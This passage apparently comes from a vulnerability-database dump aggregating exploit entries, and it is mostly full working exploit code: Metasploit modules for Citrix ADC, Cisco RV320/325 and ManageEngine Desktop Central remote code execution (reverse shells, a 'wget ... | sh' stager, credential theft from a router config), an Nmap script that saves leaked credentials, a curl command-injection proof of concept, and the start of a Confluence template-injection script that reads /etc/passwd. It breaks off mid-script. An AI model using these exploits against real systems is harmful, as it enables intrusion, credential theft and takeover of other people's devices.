port.number, path)\r\n\r\n if not response.status then\r\n stdnse.print_debug(\"Request Failed\")\r\n return\r\n end\r\n if response.status == 200 then\r\n if string.match(response.body, match) then\r\n stdnse.print_debug(\"%s: %s GET %s - 200 OK\",\r\nSCRIPT_NAME,host.targetname or host.ip, path)\r\n vuln.state = vulns.STATE.VULN\r\n citrixADC = ((\"Path traversal: https://%s:%d%s\"):format(host.targetname\r\nor host.ip,port.number, path))\r\n if outputFile then\r\n credentials = response.body:gsub('%W','.')\r\nvuln.check_results = stdnse.format_output(true, citrixADC)\r\n vuln.extra_info = stdnse.format_output(true, \"Credentials are being\r\nstored in the output file\")\r\nfile = io.open(outputFile, \"a\")\r\nfile:write(credentials, \"\\n\")\r\n else\r\n vuln.check_results = stdnse.format_output(true, citrixADC)\r\n end\r\n end\r\n elseif response.status == 403 then\r\n stdnse.print_debug(\"%s: %s GET %s - %d\", SCRIPT_NAME, host.targetname\r\nor host.ip, path, response.status)\r\n vuln.state = vulns.STATE.NOT_VULN\r\n end\r\n\r\n return vuln_report:make_output(vuln)\r\nend\n\n# 0day.today [2020-01-19] #", "sourceHref": "https://0day.today/exploit/33824", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-19T23:04:26", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2020-01-13T00:00:00", "type": "zdt", "title": "Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-13T00:00:00", "id": "1337DAY-ID-33806", "href": "https://0day.today/exploit/description/33806", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Citrix ADC Remote Code Execution',\r\n 'Description' => %q(\r\n An issue was discovered in Citrix Application Delivery Controller (ADC)\r\n and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.\r\n ),\r\n 'Author' => [\r\n 'RAMELLA S\u00e9bastien' # https://www.pirates.re/\r\n ],\r\n 'References' => [\r\n ['CVE', '2019-19781'],\r\n ['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],\r\n ['EDB', '47901'],\r\n ['EDB', '47902']\r\n ],\r\n 'DisclosureDate' => '2019-12-17',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl meterpreter'\r\n }\r\n },\r\n 'Targets' => [\r\n ['Unix (remote shell)',\r\n 'Type' => :cmd_shell,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/reverse_perl',\r\n 'DisablePayloadHandler' => 'false'\r\n }\r\n ],\r\n ['Unix (command-line)',\r\n 'Type' => :cmd_generic,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/generic',\r\n 'DisablePayloadHandler' => 'true'\r\n }\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'RPORT' => 443,\r\n 'SSL' => true\r\n },\r\n 'Notes' => {\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION],\r\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\r\n }\r\n ))\r\n\r\n register_options([\r\n OptAddress.new('RHOST', [true, 'The target address'])\r\n ])\r\n\r\n register_advanced_options([\r\n OptBool.new('ForceExploit', [false, 'Override check result', false])\r\n ])\r\n\r\n deregister_options('RHOSTS')\r\n end\r\n\r\n def execute_command(command, opts = {})\r\n filename = Rex::Text.rand_text_alpha(16)\r\n nonce = Rex::Text.rand_text_alpha(6)\r\n\r\n request = {\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'),\r\n 'headers' => {\r\n 'NSC_USER' => '../../../netscaler/portal/templates/' + filename,\r\n 'NSC_NONCE' => nonce\r\n },\r\n 'vars_post' => {\r\n 'url' => 'http://127.0.0.1',\r\n 'title' => \"[% template.new({'BLOCK'='print readpipe(#{get_chr_payload(command)})'})%]\",\r\n 'desc' => 'desc',\r\n 'UI_inuse' => 'RfWeb'\r\n },\r\n 'encode_params' => false\r\n }\r\n\r\n begin\r\n received = send_request_cgi(request)\r\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\r\n print_error('Unable to connect on the remote target.')\r\n end\r\n return false unless received\r\n\r\n if received.code == 200\r\n vprint_status(\"#{received.get_html_document.text}\")\r\n sleep 2\r\n\r\n request = {\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'),\r\n 'headers' => {\r\n 'NSC_USER' => nonce,\r\n 'NSC_NONCE' => nonce\r\n }\r\n }\r\n\r\n ## Trigger to gain exploitation.\r\n begin\r\n send_request_cgi(request)\r\n received = send_request_cgi(request)\r\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\r\n print_error('Unable to connect on the remote target.')\r\n end\r\n return false unless received\r\n return received\r\n end\r\n\r\n return false\r\n end\r\n\r\n def get_chr_payload(command)\r\n chr_payload = command\r\n i = chr_payload.length\r\n\r\n output = \"\"\r\n chr_payload.each_char do | c |\r\n i = i - 1\r\n output << \"chr(\" << c.ord.to_s << \")\"\r\n if i != 0\r\n output << \" . \"\r\n end\r\n end\r\n\r\n return output\r\n end\r\n\r\n def check\r\n begin\r\n received = send_request_cgi(\r\n \"method\" => \"GET\",\r\n \"uri\" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf')\r\n )\r\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\r\n print_error('Unable to connect on the remote target.')\r\n end\r\n\r\n if received && received.code != 200\r\n return Exploit::CheckCode::Safe\r\n end\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n def exploit\r\n unless check.eql? Exploit::CheckCode::Vulnerable\r\n unless datastore['ForceExploit']\r\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\r\n end\r\n else\r\n print_good('The target appears to be vulnerable.')\r\n end\r\n\r\n case target['Type']\r\n when :cmd_generic\r\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\r\n vprint_status(\"Generated command payload: #{payload.encoded}\")\r\n\r\n received = execute_command(payload.encoded)\r\n if (received) && (datastore['PAYLOAD'] == \"cmd/unix/generic\")\r\n print_warning('Dumping command output in parsed http response')\r\n print_good(\"#{received.get_html_document.text}\")\r\n else\r\n print_warning('Empty response, no command output')\r\n return\r\n end\r\n\r\n when :cmd_shell\r\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\r\n vprint_status(\"Generated command payload: #{payload.encoded}\")\r\n\r\n execute_command(payload.encoded)\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2020-01-19] #", "sourceHref": "https://0day.today/exploit/33806", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-03-30T17:25:29", "description": "Command injection vulnerability in the web-based certificate generator feature of the Cisco RV320 router which was inadequately patched by the vendor.", "cvss3": {}, "published": "2019-03-27T00:00:00", "type": "zdt", "title": "Cisco RV320 Command Injection Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1652"], "modified": "2019-03-27T00:00:00", "id": "1337DAY-ID-32437", "href": "https://0day.today/exploit/description/32437", "sourceData": "Cisco RV320 Command Injection Vulnerability\r\n\r\nProduct: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others\r\nAffected Versions: 1.4.2.15 through 1.4.2.20\r\nFixed Versions: none\r\nVulnerability Type: Remote Code Execution\r\nSecurity Risk: medium\r\nVendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject\r\nVendor Status: working on patch\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-005\r\nAdvisory Status: published\r\nCVE: CVE-2019-1652\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n\"Keep your employees, your business, and yourself productive and\r\neffective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal\r\nchoice for any small office or small business looking for performance,\r\nsecurity, and reliability in its network.\"\r\n(from the Cisco RV320 product page [1])\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe router's web interface enables users to generate new X.509\r\ncertificates directly on the device. Previously, RedTeam Pentesting\r\nidentified a vulnerability (rt-sa-2018-004) [2] in this component. By\r\nproviding a specially crafted common name, it was possible to inject\r\nshell commands which were subsequently executed on the router as the\r\nroot user. This vulnerability was adressed in firmware version 1.4.2.19\r\npublished by Cisco [3].\r\n\r\nRedTeam Pentesting discovered that the certificate generator in the patched\r\nfirmware is still vulnerable. The update adds several filters to handle\r\nsingle quotes in user input. However, these filters can be evaded by\r\nspecially crafted inputs. By providing the following string for the\r\ncertificate's common name, a \"ping\" command can be injected:\r\n\r\n------------------------------------------------------------------------\r\n'a$(ping -c 4 192.168.1.2)'b\r\n------------------------------------------------------------------------\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nThe following HTTP POST request invokes the certificate generator\r\nfunction and triggers the command injection. It requires a valid session\r\ncookie for the device's web interface. The user agent \"curl\" is\r\nblacklisted by the firmware and must be adjusted in the HTTP client.\r\n\r\n------------------------------------------------------------------------\r\n$ curl -s -k -A kurl -X POST -b \"$COOKIE\" \\\r\n--data \"page=self_generator.htm&totalRules=1&OpenVPNRules=30\"\\\r\n\"&submitStatus=1&log_ch=1&type=4&Country=A&state=A&locality=A\"\\\r\n\"&organization=A&organization_unit=A&email=ab%40example.com\"\\\r\n\"&KeySize=512&KeyLength=1024&valid_days=30&SelectSubject_c=1&\"\\\r\n\"SelectSubject_s=1\" \\\r\n--data-urlencode \"common_name='a\\$(ping -c 4 192.168.1.2)'b\" \\\r\n\"https://192.168.1.1/certificate_handle2.htm?type=4\"\r\n------------------------------------------------------------------------\r\n\r\nAfterwards, the incoming ICMP echo requests can be observed on the\r\nattacker's system at 192.168.1.2.\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nPrevent untrusted users from using the router's web interface.\r\n\r\n\r\nFix\r\n===\r\n\r\nNone\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThe vulnerability allows attackers with administrative access to the\r\nrouter's web interface to execute arbitrary operating system commands on\r\nthe device. Because attackers require valid credentials to the web\r\ninterface, this vulnerability is only rated as a medium risk.\n\n# 0day.today [2019-03-30] #", "sourceHref": "https://0day.today/exploit/32437", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2019-03-30T11:26:16", "description": "", "cvss3": {}, "published": "2019-03-30T00:00:00", "type": "packetstorm", "title": "Cisco RV320 / RV325 Unauthenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1653", "CVE-2019-1652"], "modified": "2019-03-30T00:00:00", "id": "PACKETSTORM:152305", "href": "https://packetstormsecurity.com/files/152305/Cisco-RV320-RV325-Unauthenticated-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = NormalRanking \n \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Cisco RV320 and RV325 Unauthenticated Remote Code Execution\", \n'Description' => %q{ \nThis exploit module combines an information disclosure (CVE-2019-1653) \nand a command injection vulnerability (CVE-2019-1652) together to gain \nunauthenticated remote code execution on Cisco RV320 and RV325 small business \nrouters. Can be exploited via the WAN interface of the router. Either via HTTPS \non port 443 or HTTP on port 8007 on some older firmware versions. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'RedTeam Pentesting GmbH', # Discovery, Metasploit \n'Philip Huppert', # Discovery \n'Benjamin Grap' # Metasploit \n], \n'References' => [ \n[ 'CVE','2019-1653' ], \n[ 'CVE','2019-1652' ], \n[ 'EDB','46243' ], \n[ 'BID','106728' ], \n[ 'BID','106732' ], \n[ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-002/-cisco-rv320-unauthenticated-configuration-export' ], \n[ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection' ] \n], \n'Platform' => 'linux', \n'Targets' => \n[ \n[ 'LINUX MIPS64', \n{ \n'Platform' => 'linux', \n'Arch' => ARCH_MIPS64 \n} \n] \n], \n'Payload' => \n{ \n'BadChars' => \"\" \n}, \n'CmdStagerFlavor' => [ 'bourne' ], \n'Privileged' => true, \n'DisclosureDate' => \"Sep 9 2018\", \n'DefaultTarget' => 0)) \n \nregister_options([ \nOpt::RPORT(8007), # port of Cisco webinterface \nOptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)', '/']), \nOptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15]), \nOptBool.new('USE_SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]) # Don't use 'SSL' option to prevent HttpServer from picking this up. \n]) \nderegister_options('SSL') # prevent SSL in HttpServer and resulting payload requests since the injected wget command will not work with '--no-check-certificate' option. \nderegister_options('SSLCert') # not required since stager only uses HTTP. \nend \n \ndef execute_command(cmd, opts = {}) \n# use generated payload, we don't have to do anything here \nend \n \ndef autofilter \ntrue \nend \n \ndef on_request_uri(cli, req) \nprint_status(\"#{peer} - Payload request received: #{req.uri}\") \n@cmdstager = generate_cmdstager().join(';') \nsend_response(cli, \"#{@cmdstager}\") \nend \n \ndef primer \npayload_url = get_uri \nprint_status(\"Downloading configuration from #{peer}\") \nif(datastore['USE_SSL']) \nprint_status(\"Using SSL connection to router.\") \nend \nres = send_request_cgi({ \n'uri' => normalize_uri(\"cgi-bin\",\"config.exp\"), \n'SSL' => datastore['USE_SSL'] \n}) \nunless res \nvprint_error('Connection failed.') \nreturn nil \nend \n \nunless res.code == 200 \nvprint_error('Could not download config. Aborting.') \nreturn nil \nend \n \nprint_status(\"Successfully downloaded config\") \nusername = res.body.match(/^USERNAME=([a-zA-Z]+)/)[1] \npass = res.body.match(/^PASSWD=(\\h+)/)[1] \nauthkey = \"1964300002\" \nprint_status(\"Got MD5-Hash: #{pass}\") \nprint_status(\"Loging in as user #{username} using password hash.\") \nprint_status(\"Using default auth_key #{authkey}\") \nres2 = send_request_cgi({ \n'uri' => normalize_uri(\"cgi-bin\",\"userLogin.cgi\"), \n'SSL' => datastore['USE_SSL'], \n'method' => 'POST', \n'data' => \"login=true&portalname=CommonPortal&password_expired=0&auth_key=#{authkey}&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch&current_password=&new_password=&re_new_password=\" \n}) \n \nunless res \nvprint_error('Connection failed during login. Aborting.') \nreturn nil \nend \n \nunless res.code == 200 \nvprint_error('Login failed with downloaded credentials. Aborting.') \nreturn nil \nend \n \n#Extract authentication cookies \ncookies = res2.get_cookies() \nprint_status(\"Successfully logged in as user #{username}.\") \nprint_status(\"Got cookies: #{cookies}\") \nprint_status(\"Sending payload. Staging via #{payload_url}.\") \n#Build staging command \ncommand_string = CGI::escape(\"'$(wget -q -O- #{payload_url}|sh)'\") \nif(command_string.length <= 63) \nprint_status(\"Staging command length looks good. Sending exploit!\") \nelse \nvprint_error(\"Warning: Staging command length probably too long. Trying anyway...\") \nend \n \nres3 = send_request_cgi({ \n'uri' => normalize_uri(\"certificate_handle2.htm\"), \n'SSL' => datastore['USE_SSL'], \n'method' => 'POST', \n'cookie' => cookies, \n'vars_get' => { \n'type' => '4', \n}, \n'vars_post' => { \n'page' => 'self_generator.htm', \n'totalRules' => '1', \n'OpenVPNRules' => '30', \n'submitStatus' => '1', \n'log_ch' => '1', \n'type' => '4', \n'Country' => 'A', \n'state' => 'A', \n'locality' => 'A', \n'organization' => 'A', \n'organization_unit' => 'A', \n'email' => 'any@example.com', \n'KeySize' => '512', \n'KeyLength' => '1024', \n'valid_days' => '30', \n'SelectSubject_c' => '1', \n'SelectSubject_s' => '1' \n}, \n'data' => \"common_name=#{command_string}\" \n}) \nunless res3 \nvprint_error('Connection failed while sending command. Aborting.') \nreturn nil \nend \n \nunless res3.code == 200 \nvprint_error('Sending command not successful.') \nreturn nil \nend \nprint_status(\"Sending payload timed out. Waiting for stager to connect...\") \nend \n \ndef check \n#Check if device is vulnerable by downloading the config \nres = send_request_cgi({'uri'=>normalize_uri(\"cgi-bin\",\"config.exp\")}) \n \nunless res \nvprint_error('Connection failed.') \nreturn CheckCode::Unknown \nend \n \nunless res.code == 200 \nreturn CheckCode::Safe \nend \n \nunless res.body =~ /PASSWD/ \nreturn CheckCode::Detected \nend \n \nCheckCode::Vulnerable \nend \n \ndef exploit \n# Main function. \n# Setting delay for the Stager. \nTimeout.timeout(datastore['HTTPDELAY']) {super} \nrescue Timeout::Error \nprint_status(\"Waiting for stager connection timed out. Try increasing the delay.\") \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/152305/cisco_rv32x_rce.rb.txt", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-03-14T22:50:18", "description": "", "cvss3": {}, "published": "2020-03-14T00:00:00", "type": "packetstorm", "title": "ManageEngine Desktop Central Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-14T00:00:00", "id": "PACKETSTORM:156730", "href": "https://packetstormsecurity.com/files/156730/ManageEngine-Desktop-Central-Java-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ManageEngine Desktop Central Java Deserialization', \n'Description' => %q{ \nThis module exploits a Java deserialization vulnerability in the \ngetChartImage() method from the FileStorage class within ManageEngine \nDesktop Central versions < 10.0.474. Tested against 10.0.465 x64. \n \n\"The short-term fix for the arbitrary file upload vulnerability was \nreleased in build 10.0.474 on January 20, 2020. In continuation of that, \nthe complete fix for the remote code execution vulnerability is now \navailable in build 10.0.479.\" \n}, \n'Author' => [ \n'mr_me', # Discovery and exploit \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-10189'], \n['URL', 'https://srcincite.io/advisories/src-2020-0011/'], \n['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'], \n['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'], \n['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html'] \n], \n'DisclosureDate' => '2020-03-05', # 0day release \n'License' => MSF_LICENSE, \n'Platform' => 'windows', \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n['Windows Command', \n'Arch' => ARCH_CMD, \n'Type' => :win_cmd \n], \n['Windows Dropper', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :win_dropper \n], \n['PowerShell Stager', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :psh_stager \n] \n], \n'DefaultTarget' => 2, \n'DefaultOptions' => { \n'RPORT' => 8383, \n'SSL' => true, \n'WfsDelay' => 60 # It can take a little while to trigger \n}, \n'CmdStagerFlavor' => 'certutil', # This works without issue \n'Notes' => { \n'PatchedVersion' => Gem::Version.new('100474'), \n'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page? \n'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'configurations.do') \n) \n \nunless res \nreturn CheckCode::Unknown('Target is not responding to check') \nend \n \nunless res.code == 200 && res.body.include?('ManageEngine Desktop Central') \nreturn CheckCode::Unknown('Target is not running Desktop Central') \nend \n \nversion = res.get_html_document.at('//input[@id = \"buildNum\"]/@value')&.text \n \nunless version \nreturn CheckCode::Detected('Could not detect Desktop Central version') \nend \n \nvprint_status(\"Detected Desktop Central version #{version}\") \n \nif Gem::Version.new(version) < notes['PatchedVersion'] \nreturn CheckCode::Appears(\"#{version} is an exploitable version\") \nend \n \nCheckCode::Safe(\"#{version} is not an exploitable version\") \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :win_cmd \nexecute_command(payload.encoded) \nwhen :win_dropper \nexecute_cmdstager \nwhen :psh_stager \nexecute_command(cmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n)) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \n# XXX: An executable is required to run arbitrary commands \ncmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper \n \nvprint_status(\"Serializing command: #{cmd}\") \n \n# I identified mr_me's binary blob as the CommonsBeanutils1 payload :) \nserialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload( \n'CommonsBeanutils1', \ncmd \n) \n \n# XXX: Patch in expected serialVersionUID \nserialized_payload[140, 8] = \"\\xcf\\x8e\\x01\\x82\\xfe\\x4e\\xf1\\x7e\" \n \n# Rock 'n' roll! \nupload_serialized_payload(serialized_payload) \ndeserialize_payload \nend \n \ndef upload_serialized_payload(serialized_payload) \nprint_status('Uploading serialized payload') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, \n'/mdm/client/v1/mdmLogUploader'), \n'ctype' => 'application/octet-stream', \n'vars_get' => { \n'udid' => 'si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart', \n'filename' => 'logger.zip' \n}, \n'data' => serialized_payload \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Could not upload serialized payload') \nend \n \nprint_good('Successfully uploaded serialized payload') \n \n# C:\\Program Files\\DesktopCentral_Server\\bin \nregister_file_for_cleanup('..\\\\webapps\\\\DesktopCentral\\\\_chart\\\\logger.zip') \nend \n \ndef deserialize_payload \nprint_status('Deserializing payload') \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'cewolf/'), \n'vars_get' => {'img' => '\\\\logger.zip'} \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Could not deserialize payload') \nend \n \nprint_good('Successfully deserialized payload') \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156730/desktopcentral_deserialization.rb.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-22T15:47:25", "description": "", "cvss3": {}, "published": "2021-01-22T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence 6.12.1 Template Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-3396"], "modified": "2021-01-22T00:00:00", "id": "PACKETSTORM:161065", "href": "https://packetstormsecurity.com/files/161065/Atlassian-Confluence-6.12.1-Template-Injection.html", "sourceData": "`# Exploit Title: Atlassian Confluence Widget Connector Macro - SSTI \n# Date: 21-Jan-2021 \n# Exploit Author: 46o60 \n# Vendor Homepage: https://www.atlassian.com/software/confluence \n# Software Link: https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin \n# Version: 6.12.1 \n# Tested on: Ubuntu 20.04.1 LTS \n# CVE : CVE-2019-3396 \n \n#!/usr/bin/env python3 \n# -*- coding: UTF-8 -*- \n\"\"\" \n \nExploit for CVE-2019-3396 (https://www.cvedetails.com/cve/CVE-2019-3396/) Widget Connector macro in Atlassian \nConfluence Server server-side template injection. \n \nVulnerability information: \nAuthors: \nDaniil Dmitriev - Discovering vulnerability \nDmitry (rrock) Shchannikov - Metasploit module \nExploit \nExploitDB: \nhttps://www.exploit-db.com/exploits/46731 \nMetasploit \nhttps://www.rapid7.com/db/modules/exploit/multi/http/confluence_widget_connector/ \nexploit/multi/http/confluence_widget_connector \n \nWhile Metasploit module works perfectly fine it has a limitation that to gain RCE outbound FTP request is being made \nfrom the target Confluence server towards attacker's server where the Velocity template with the payload is being \nhosted. If this is not possible, for example, because network where the target Confluence server is located filters all \noutbound traffic, alternative approach is needed. This exploit, in addition to original exploit implements this \nalternative approach by first uploading the template to the server and then loading it with original vulnerability from \nlocal file system. The limitation is that to upload a file, a valid session is needed for a non-privileged user. Any \nuser can upload a file to the server by attaching the file to his \"personal space\". \n \nThere are two modes of the exploit: \n1. Exploiting path traversal for file disclosure and directory listings. \n2. RCE by uploading a template file with payload to the server. \n \nIn case where network is filtered and loading remote template is not possible and also you do not have a low-privileged \nuser session, you can still exploit the '_template' parameter to browse the server file system by using the first mode \nof this exploit. Conveniently, application returns file content as well as directory listing depending on to what path \nis pointing to. As in original exploit no authentication is needed for this mode. \n \nLimitations of path traversal exploit: \n- not possible to distinguish between non-existent path and lack of permissions \n- no distinction between files and directories in the output \n \nIf you have ability to authenticate to the server and have enough privileges to upload files use the second mode. A \nregular user probably has enough privileges for this since each user can have their own personal space where they \nshould be able to add attachments. This exploit automatically finds the personal space, or creates one if it does not \nexists, a file with Velocity template payload. It then uses the original vulnerability but loads the template file \nwith payload from local filesystem instead from remote system. \n \nPrerequisite of RCE in this exploit: \n- authenticated session is needed \n- knowledge of where attached files are stored on the file system - if it is not default location then use first mode \nto find it, should be in Confluence install directory under ./attachments subdirectory \n \nUsage \n- list /etc folder on Confluence server hosted on http://confluence.example.com \npython exploit.py -th confluence.example.com fs /etc \n- get content of /etc/passwd on same server but through a proxy \npython exploit.py -th confluence.example.com -px http://127.0.0.1:8080 fs /etc/passwd \n- execute 'whoami' command on the same server (this will upload a template file with payload to the server using \nexisting session) \npython exploit.py -th confluence.example.com rce -c JSESSIONID=ABCDEF123456789ABCDEF123456789AB \"whoami\" \n \nTested on Confluence versions: \n6.12.1 \n \nTo test the exploit: \n1. Download Confluence trial version for version 6.12.1 \nhttps://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin \n(to find this URL go to download page for the latest version, pick LTS release Linux 64 Bit, turn on the browser \nnetwork tools to capture HTTP traffic, click Submit, take the URL from request towards 'product-downloads' and \nchange the version in URL to be 6.12.1) \nSHA256: 679b1c05cf585b92af9888099c4a312edb2c4f9f4399cf1c1b716b03c114e9e6 atlassian-confluence-6.12.1-x64.bin \n2. Run the binary to install it, for example on Ubuntu 20.04. Use \"Express Install\" and everything by default. \nchmod +x atlassian-confluence-6.12.1-x64.bin \nsudo ./atlassian-confluence-6.12.1-x64.bin \n3. Open the browser to configure initial installation, when you get to license window copy the server ID. \n4. Create account at https://my.atlassian.com/ and request for new trial license using server ID. \n5. Activate the license and finish the installation with default options. \n6. Create a user and login with him to go through initial user setup and get the session id for RCE part of the \nexploit. \n7. Run the exploit (see usage above). \n\"\"\" \n \n__version__ = \"1.0.0\" \n__author__ = \"46o60\" \n \nimport argparse \nimport logging \nimport requests \nimport urllib3 \nfrom bs4 import BeautifulSoup \nimport re \nimport json \nimport random \nimport string \n \n# script and banner \nSCRIPT_NAME = \"CVE-2019-3396: Confluence exploit script\" \nASCII_BANNER_TEXT = \"\"\"____ ____ _ _ ____ _ _ _ ____ _ _ ____ ____ ____ \n| | | |\\ | |___ | | | |___ |\\ | | | | |__/ \n|___ |__| | \\| | |___ |__| |___ | \\| |___ |__| | \\ \n \n\"\"\" \n \n# turn off requests log output \nurllib3.disable_warnings() \nlogging.getLogger(\"urllib3\").setLevel(logging.WARNING) \n \n \ndef print_banner(): \n\"\"\" \nPrints script ASCII banner and basic information. \n \nBecause it is cool. \n\"\"\" \nprint(ASCII_BANNER_TEXT) \nprint(\"{} v{}\".format(SCRIPT_NAME, __version__)) \nprint(\"Author: {}\".format(__author__)) \nprint() \n \n \ndef exit_log(logger, message): \n\"\"\" \nUtility function to log exit message and finish the script. \n\"\"\" \nlogger.error(message) \nexit(1) \n \n \ndef check_cookie_format(value): \n\"\"\" \nChecks if value is in format: ^[^=]+=[^=]+$ \n\"\"\" \npattern = r\"^[^=]+=[^=]+$\" \nif not re.match(pattern, value): \nraise argparse.ArgumentTypeError(\"provided cookie string does not have correct format\") \nreturn value \n \n \ndef parse_arguments(): \n\"\"\" \nPerforms parsing of script arguments. 